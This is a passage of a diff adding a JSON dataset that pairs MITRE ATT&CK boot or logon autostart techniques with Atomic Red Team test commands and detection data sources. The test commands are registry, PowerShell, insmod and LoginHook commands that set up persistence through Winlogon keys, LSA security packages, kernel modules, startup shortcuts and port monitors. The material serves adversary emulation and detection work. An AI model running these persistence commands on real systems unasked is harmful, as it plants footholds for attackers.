"https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1547.004", + "command_list": [ + "Set-ItemProperty \"HKCU:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\" \"Shell\" \"explorer.exe, C:\\Windows\\System32\\cmd.exe\" -Force\n", + "Set-ItemProperty \"HKCU:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\" \"Userinit\" \"Userinit.exe, C:\\Windows\\System32\\cmd.exe\" -Force\n", + "New-Item 
\"HKCU:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\" -Force\nSet-ItemProperty \"HKCU:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\" \"logon\" \"C:\\Windows\\Temp\\atomicNotificationPackage.dll\" -Force\n" + ], + "commands": [ + { + "command": "Set-ItemProperty \"HKCU:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\" \"Shell\" \"explorer.exe, C:\\Windows\\System32\\cmd.exe\" -Force\n", + "source": "atomics/T1547.004/T1547.004.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Winlogon Helper DLL" + }, + { + "command": "Set-ItemProperty \"HKCU:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\" \"Userinit\" \"Userinit.exe, C:\\Windows\\System32\\cmd.exe\" -Force\n", + "source": "atomics/T1547.004/T1547.004.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Winlogon Helper DLL" + }, + { + "command": "New-Item \"HKCU:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\" -Force\nSet-ItemProperty \"HKCU:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\" \"logon\" \"C:\\Windows\\Temp\\atomicNotificationPackage.dll\" -Force\n", + "source": "atomics/T1547.004/T1547.004.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Winlogon Helper DLL" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1547.004", + "display_name": "Boot or Logon Autostart Execution: Winlogon Helper DLL", + "atomic_tests": [ + { + "name": "Winlogon Shell Key Persistence - PowerShell", + "auto_generated_guid": "bf9f9d65-ee4d-4c3e-a843-777d04f19c38", + "description": "PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.\n\nUpon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "binary_to_execute": { + "description": "Path of binary to execute", + "type": 
"Path", + "default": "C:\\Windows\\System32\\cmd.exe" + } + }, + "executor": { + "command": "Set-ItemProperty \"HKCU:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\" \"Shell\" \"explorer.exe, #{binary_to_execute}\" -Force\n", + "cleanup_command": "Remove-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\" -Name \"Shell\" -Force -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Winlogon Userinit Key Persistence - PowerShell", + "auto_generated_guid": "fb32c935-ee2e-454b-8fa3-1c46b42e8dfb", + "description": "PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.\n\nUpon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "binary_to_execute": { + "description": "Path of binary to execute", + "type": "Path", + "default": "C:\\Windows\\System32\\cmd.exe" + } + }, + "executor": { + "command": "Set-ItemProperty \"HKCU:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\" \"Userinit\" \"Userinit.exe, #{binary_to_execute}\" -Force\n", + "cleanup_command": "Remove-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\" -Name \"Userinit\" -Force -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Winlogon Notify Key Logon Persistence - PowerShell", + "auto_generated_guid": "d40da266-e073-4e5a-bb8b-2b385023e5f9", + "description": "PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.\n\nUpon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "binary_to_execute": { + "description": "Path of notification package to execute", + "type": "Path", + "default": "C:\\Windows\\Temp\\atomicNotificationPackage.dll" 
+ } + }, + "executor": { + "command": "New-Item \"HKCU:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\" -Force\nSet-ItemProperty \"HKCU:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\" \"logon\" \"#{binary_to_execute}\" -Force\n", + "cleanup_command": "Remove-Item \"HKCU:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\" -Force -ErrorAction Ignore\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + 
"collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": 
"process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1547.005", + "command_list": [ + "# run these in sequence\n$SecurityPackages = Get-ItemProperty HKLM:\\System\\CurrentControlSet\\Control\\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'\n$SecurityPackagesUpdated = $SecurityPackages\n$SecurityPackagesUpdated += \"not-a-ssp\"\nSet-ItemProperty HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated\n\n# revert (before reboot)\nSet-ItemProperty HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa -Name 'Security Packages' -Value $SecurityPackages\n" + ], + "commands": [ + { + "command": "# run these in sequence\n$SecurityPackages = Get-ItemProperty HKLM:\\System\\CurrentControlSet\\Control\\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'\n$SecurityPackagesUpdated = $SecurityPackages\n$SecurityPackagesUpdated += \"not-a-ssp\"\nSet-ItemProperty HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated\n\n# revert (before reboot)\nSet-ItemProperty HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa -Name 'Security Packages' -Value $SecurityPackages\n", + "source": "atomics/T1547.005/T1547.005.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Security Support Provider" + } + ], + 
"parsed_datasets": [ + { + "attack_technique": "T1547.005", + "display_name": "Boot or Logon Autostart Execution: Security Support Provider", + "atomic_tests": [ + { + "name": "Modify SSP configuration in registry", + "auto_generated_guid": "afdfd7e3-8a0b-409f-85f7-886fdf249c9e", + "description": "Add a value to a Windows registry SSP key, simulating an adversarial modification of those keys.", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "fake_ssp_dll": { + "description": "Value added to registry key. Normally refers to a DLL name in C:\\Windows\\System32.", + "type": "String", + "default": "not-a-ssp" + } + }, + "executor": { + "command": "# run these in sequence\n$SecurityPackages = Get-ItemProperty HKLM:\\System\\CurrentControlSet\\Control\\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'\n$SecurityPackagesUpdated = $SecurityPackages\n$SecurityPackagesUpdated += \"#{fake_ssp_dll}\"\nSet-ItemProperty HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated\n\n# revert (before reboot)\nSet-ItemProperty HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa -Name 'Security Packages' -Value $SecurityPackages\n", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + 
"data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + 
"container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1547.006", + "command_list": [ + "sudo insmod #{module_path}\n", + "sudo insmod /tmp/T1547.006/T1547006.ko\n" + ], + "commands": [ + { + "command": "sudo insmod #{module_path}\n", + "source": "atomics/T1547.006/T1547.006.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Kernel Modules and Extensions" + }, + { + "command": "sudo insmod /tmp/T1547.006/T1547006.ko\n", + "source": "atomics/T1547.006/T1547.006.yaml", + "name": "Atomic Red 
Team Test - Boot or Logon Autostart Execution: Kernel Modules and Extensions" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1547.006", + "display_name": "Boot or Logon Autostart Execution: Kernel Modules and Extensions", + "atomic_tests": [ + { + "name": "Linux - Load Kernel Module via insmod", + "auto_generated_guid": "687dcb93-9656-4853-9c36-9977315e9d23", + "description": "This test uses the insmod command to load a kernel module for Linux.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "module_name": { + "description": "Name of the kernel module name.", + "type": "String", + "default": "T1547006" + }, + "module_path": { + "description": "Folder used to store the module.", + "type": "Path", + "default": "/tmp/T1547.006/T1547006.ko" + }, + "temp_folder": { + "description": "Temp folder used to compile the code.", + "type": "Path", + "default": "/tmp/T1547.006" + }, + "module_source_path": { + "description": "Path to download Gsecdump binary file", + "type": "Url", + "default": "PathToAtomicsFolder/T1547.006/src" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "The kernel module must exist on disk at specified location\n", + "prereq_command": "if [ -f #{module_path} ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;\ncp #{module_source_path}/* #{temp_folder}/\ncd #{temp_folder}; make\nif [ ! 
-f #{module_path} ]; then mv #{temp_folder}/#{module_name}.ko #{module_path}; fi;\n" + } + ], + "executor": { + "command": "sudo insmod #{module_path}\n", + "cleanup_command": "sudo rmmod #{module_name}\n[ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder}\n", + "name": "bash", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "kernel", + "definition": "Information associated with the operating system kernel of a host.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Linux", + "macOS" + ], + "data_component": "kernel module load", + "description": "A kernel module was loaded on a host.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "kernel module" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://www.stigviewer.com/stig/oracle_linux_5/2016-12-20/finding/V-22383", + "https://man7.org/linux/man-pages/man2/init_module.2.html" + ] + ] + }, + { + "technique_id": "T1547.007", + "command_list": [ + "sudo defaults write com.apple.loginwindow LoginHook /path/to/script\n" + ], + "commands": [ + { + "command": "sudo defaults write com.apple.loginwindow LoginHook /path/to/script\n", + "source": "atomics/T1547.007/T1547.007.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Re-opened Applications" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1547.007", + "display_name": "Boot or Logon Autostart Execution: Re-opened Applications", + "atomic_tests": [ + { + 
"name": "Re-Opened Applications", + "auto_generated_guid": "5fefd767-ef54-4ac6-84d3-751ab85e8aba", + "description": "Plist Method\n\n[Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html)\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "steps": "1. create a custom plist:\n\n ~/Library/Preferences/com.apple.loginwindow.plist\n\nor\n\n ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist\n", + "name": "manual" + } + }, + { + "name": "Re-Opened Applications", + "auto_generated_guid": "5f5b71da-e03f-42e7-ac98-d63f9e0465cb", + "description": "Mac Defaults\n\n[Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html)\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "script": { + "description": "path to script", + "type": "Path", + "default": "/path/to/script" + } + }, + "executor": { + "command": "sudo defaults write com.apple.loginwindow LoginHook #{script}\n", + "cleanup_command": "sudo defaults delete com.apple.loginwindow LoginHook\n", + "elevation_required": true, + "name": "sh" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands 
executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1547.009", + "command_list": [ + "echo [InternetShortcut] > %temp%\\T1547.009_modified_shortcut.url\necho URL=C:\\windows\\system32\\calc.exe >> %temp%\\T1547.009_modified_shortcut.url\n%temp%\\T1547.009_modified_shortcut.url\n", + "$Shell = New-Object -ComObject (\"WScript.Shell\")\n$ShortCut = $Shell.CreateShortcut(\"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1547.009.lnk\")\n$ShortCut.TargetPath=\"cmd.exe\"\n$ShortCut.WorkingDirectory = \"C:\\Windows\\System32\";\n$ShortCut.WindowStyle = 1;\n$ShortCut.Description = \"T1547.009.\";\n$ShortCut.Save()\n\n$Shell = New-Object -ComObject (\"WScript.Shell\")\n$ShortCut = $Shell.CreateShortcut(\"$env:ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1547.009.lnk\")\n$ShortCut.TargetPath=\"cmd.exe\"\n$ShortCut.WorkingDirectory = \"C:\\Windows\\System32\";\n$ShortCut.WindowStyle = 1;\n$ShortCut.Description = \"T1547.009.\";\n$ShortCut.Save()\n" + ], + "commands": [ + { + "command": "echo [InternetShortcut] > %temp%\\T1547.009_modified_shortcut.url\necho URL=C:\\windows\\system32\\calc.exe >> %temp%\\T1547.009_modified_shortcut.url\n%temp%\\T1547.009_modified_shortcut.url\n", + "source": "atomics/T1547.009/T1547.009.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Shortcut Modification" + }, + { + "command": "$Shell = New-Object 
-ComObject (\"WScript.Shell\")\n$ShortCut = $Shell.CreateShortcut(\"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1547.009.lnk\")\n$ShortCut.TargetPath=\"cmd.exe\"\n$ShortCut.WorkingDirectory = \"C:\\Windows\\System32\";\n$ShortCut.WindowStyle = 1;\n$ShortCut.Description = \"T1547.009.\";\n$ShortCut.Save()\n\n$Shell = New-Object -ComObject (\"WScript.Shell\")\n$ShortCut = $Shell.CreateShortcut(\"$env:ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1547.009.lnk\")\n$ShortCut.TargetPath=\"cmd.exe\"\n$ShortCut.WorkingDirectory = \"C:\\Windows\\System32\";\n$ShortCut.WindowStyle = 1;\n$ShortCut.Description = \"T1547.009.\";\n$ShortCut.Save()\n", + "source": "atomics/T1547.009/T1547.009.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Shortcut Modification" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1547.009", + "display_name": "Boot or Logon Autostart Execution: Shortcut Modification", + "atomic_tests": [ + { + "name": "Shortcut Modification", + "auto_generated_guid": "ce4fc678-364f-4282-af16-2fb4c78005ce", + "description": "This test to simulate shortcut modification and then execute. 
example shortcut (*.lnk , .url) strings check with powershell;\ngci -path \"C:\\Users\" -recurse -include *.url -ea SilentlyContinue | Select-String -Pattern \"exe\" | FL.\nUpon execution, calc.exe will be launched.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "shortcut_file_path": { + "description": "shortcut modified and execute", + "type": "Path", + "default": "%temp%\\T1547.009_modified_shortcut.url" + } + }, + "executor": { + "command": "echo [InternetShortcut] > #{shortcut_file_path}\necho URL=C:\\windows\\system32\\calc.exe >> #{shortcut_file_path}\n#{shortcut_file_path}\n", + "cleanup_command": "del -f #{shortcut_file_path} >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Create shortcut to cmd in startup folders", + "auto_generated_guid": "cfdc954d-4bb0-4027-875b-a1893ce406f2", + "description": "LNK file to launch CMD placed in startup folder. Upon execution, open File Explorer and browse to \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\"\nto view the new shortcut.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$Shell = New-Object -ComObject (\"WScript.Shell\")\n$ShortCut = $Shell.CreateShortcut(\"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1547.009.lnk\")\n$ShortCut.TargetPath=\"cmd.exe\"\n$ShortCut.WorkingDirectory = \"C:\\Windows\\System32\";\n$ShortCut.WindowStyle = 1;\n$ShortCut.Description = \"T1547.009.\";\n$ShortCut.Save()\n\n$Shell = New-Object -ComObject (\"WScript.Shell\")\n$ShortCut = $Shell.CreateShortcut(\"$env:ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1547.009.lnk\")\n$ShortCut.TargetPath=\"cmd.exe\"\n$ShortCut.WorkingDirectory = \"C:\\Windows\\System32\";\n$ShortCut.WindowStyle = 1;\n$ShortCut.Description = \"T1547.009.\";\n$ShortCut.Save()\n", + "cleanup_command": "Remove-Item \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1547.009.lnk\" -ErrorAction Ignore\nRemove-Item 
\"$env:ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1547.009.lnk\" -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + 
"https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1547.010", + "command_list": [ + "reg add \"hklm\\system\\currentcontrolset\\control\\print\\monitors\\ART\" /v \"Atomic Red Team\" /d \"C:\\Path\\AtomicRedTeam.dll\" /t REG_SZ\n" + ], + "commands": [ + { + "command": "reg add \"hklm\\system\\currentcontrolset\\control\\print\\monitors\\ART\" /v \"Atomic Red Team\" /d \"C:\\Path\\AtomicRedTeam.dll\" /t REG_SZ\n", + "source": "atomics/T1547.010/T1547.010.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Port Monitors" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1547.010", + "display_name": "Boot or Logon Autostart Execution: Port Monitors", + "atomic_tests": [ + { + "name": "Add Port Monitor persistence in Registry", + "auto_generated_guid": "d34ef297-f178-4462-871e-9ce618d44e50", + "description": "Add key-value pair to a Windows Port Monitor registry. On the subsequent reboot dll will be execute under spoolsv with NT AUTHORITY/SYSTEM privilege.", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "monitor_dll": { + "description": "Addition to port monitor registry key. Normally refers to a DLL name in C:\\Windows\\System32. 
